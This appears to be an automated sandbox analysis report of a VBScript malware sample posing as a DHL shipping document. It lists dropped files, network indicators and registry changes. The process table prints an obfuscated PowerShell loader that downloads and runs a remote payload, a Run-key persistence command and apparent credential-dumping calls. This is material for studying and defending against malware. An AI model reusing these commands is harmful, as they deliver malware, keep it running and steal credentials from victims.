Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL Shipping Document Awb & BL.vbs
|
ASCII text, with very long lines (2227), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\kpburtts.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oogrjtkq.5mz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdzewvb3.idp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xk34jjgh.il5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvB999.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x93162959, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ycflhgp
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Proskriberes.Bet
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated
Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens
Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne
tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua
Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture)
{$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For(
$Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function
Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B
,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2
1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe
mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg
s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance
= Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet
(Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet
(Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet
(Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL.
SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l
o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet
($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e
a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe
( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne
'.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet
(Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet
(Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn
s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi
gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet
(Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet
(Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4
SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,.
T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne
'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm
p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated
Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens
Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne
tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua
Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture)
{$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For(
$Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function
Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B
,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2
1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe
mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg
s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance
= Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet
(Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet
(Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet
(Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL.
SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l
o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet
($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e
a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe
( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne
'.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet
(Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet
(Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn
s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi
gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet
(Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet
(Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4
SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,.
T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne
'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm
p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ
/d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty
-Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagnings.
|
unknown
|
||
|
https://moviesmacktalk.com/Nedsl
|
unknown
|
||
|
https://contemega.Pb)m
|
unknown
|
||
|
https://moviesmacktalk.c
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagn
|
unknown
|
||
|
https://contemega.com.do/Nedslagning
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://contemega.com.d
|
unknown
|
||
|
https://contemega.com.do/Neds
|
unknown
|
||
|
https://contemega.c
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslag
|
unknown
|
||
|
https://contemega.com.do/N
|
unknown
|
||
|
https://contemega.com.do/Nedslagnings.dwp
|
192.185.112.252
|
||
|
https://contemega.com.do
|
unknown
|
||
|
http://www.imvu.coma
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://contemega.com.do/Nedslagnings.d
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://contemega.com.do/Nedslagnin
|
unknown
|
||
|
https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
|
unknown
|
||
|
https://moviesmacktalk.com/Neds
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagning
|
unknown
|
||
|
https://contemega.com.do/
|
unknown
|
||
|
https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagnin
|
unknown
|
||
|
https://contemega.com.do/Nedslagnings.
|
unknown
|
||
|
https://contemega.com.do/Nedslagni
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagni
|
unknown
|
||
|
https://contemega.com.
|
unknown
|
||
|
https://contemega.com.do/Nedsl
|
unknown
|
||
|
https://contemega.com.do/Nedslagnings.dw
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://contemega.co
|
unknown
|
||
|
https://moviesmacktalk.com/
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagnings.d
|
unknown
|
||
|
https://contemega.com.do/zPwwF47.bin
|
192.185.112.252
|
||
|
https://contemega.com.do/Nedsla
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://contemega.com.do/Nedslagn
|
unknown
|
||
|
https://contemega.com.do/Nedslag
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://microsoft.co
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://moviesmacktalk.com/Ne
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagnings.dwpX
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://moviesmacktalk.co
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagnings
|
unknown
|
||
|
https://contemega.com.do/Ne
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://moviesmacktalk.com/N
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagnings.dw
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
|
unknown
|
||
|
https://contemega.com.do/Ned
|
unknown
|
||
|
http://contemega.com.do
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://contemega.com.do/Nedslagnings
|
unknown
|
||
|
https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://moviesmacktalk.com
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://moviesmacktalk.com/Nedsla
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://contemega.com
|
unknown
|
||
|
https://moviesmacktalk.com/Ned
|
unknown
|
||
|
https://moviesmacktalk.com/Nedslagnings.dwp
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 78 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
janbours92harbu02.duckdns.org
|
206.123.148.194
|
|
|
|
171.39.242.20.in-addr.arpa
|
unknown
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
contemega.com.do
|
192.185.112.252
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
206.123.148.194
|
janbours92harbu02.duckdns.org
|
United States
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
192.185.112.252
|
contemega.com.do
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Fiberstof
|
Ufuldkommenheds
|
||
|
HKEY_CURRENT_USER\Environment
|
Udvalgenes215
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
|
time
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
gstes
|
There are 13 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
90AD000
|
direct allocation
|
page execute and read and write
|
|
|
|
3BCD000
|
remote allocation
|
page execute and read and write
|
|
|
|
56B6000
|
heap
|
page read and write
|
||
|
22F4B000
|
stack
|
page read and write
|
||
|
87C0000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB86000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
D64000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
7FF887060000
|
trusted library allocation
|
page read and write
|
||
|
38AF000
|
heap
|
page read and write
|
||
|
224BE000
|
stack
|
page read and write
|
||
|
38A9000
|
heap
|
page read and write
|
||
|
D6B000
|
heap
|
page read and write
|
||
|
5D2000
|
heap
|
page read and write
|
||
|
7FF8870F0000
|
trusted library allocation
|
page read and write
|
||
|
1C22DBA0000
|
heap
|
page read and write
|
||
|
38D7000
|
heap
|
page read and write
|
||
|
1C22F81C000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
D74000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
8137000
|
stack
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
D7B000
|
heap
|
page read and write
|
||
|
7FF886F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
5659000
|
heap
|
page read and write
|
||
|
1C22DB35000
|
heap
|
page read and write
|
||
|
1C22DB62000
|
heap
|
page read and write
|
||
|
D8B000
|
heap
|
page read and write
|
||
|
87F0000
|
direct allocation
|
page execute and read and write
|
||
|
6D3E000
|
stack
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
137A8CD1000
|
trusted library allocation
|
page read and write
|
||
|
38A0000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
D5D000
|
heap
|
page read and write
|
||
|
334D000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
565C000
|
heap
|
page read and write
|
||
|
137B132B000
|
heap
|
page read and write
|
||
|
22CD1000
|
heap
|
page read and write
|
||
|
1C22D9F0000
|
heap
|
page read and write
|
||
|
1C22DAFB000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
1C22DAEF000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
5E1000
|
heap
|
page read and write
|
||
|
690000
|
direct allocation
|
page read and write
|
||
|
38A5000
|
heap
|
page read and write
|
||
|
1C22DA9C000
|
heap
|
page read and write
|
||
|
2235E000
|
stack
|
page read and write
|
||
|
2EC4000
|
trusted library allocation
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
22C9D000
|
heap
|
page read and write
|
||
|
5651000
|
heap
|
page read and write
|
||
|
38A9000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
1C22DB7B000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
22F0A000
|
stack
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
1C22F82A000
|
heap
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
3DE000
|
unkown
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
565F000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
854B000
|
heap
|
page read and write
|
||
|
1C22DB86000
|
heap
|
page read and write
|
||
|
D81000
|
heap
|
page read and write
|
||
|
8D37000
|
trusted library allocation
|
page read and write
|
||
|
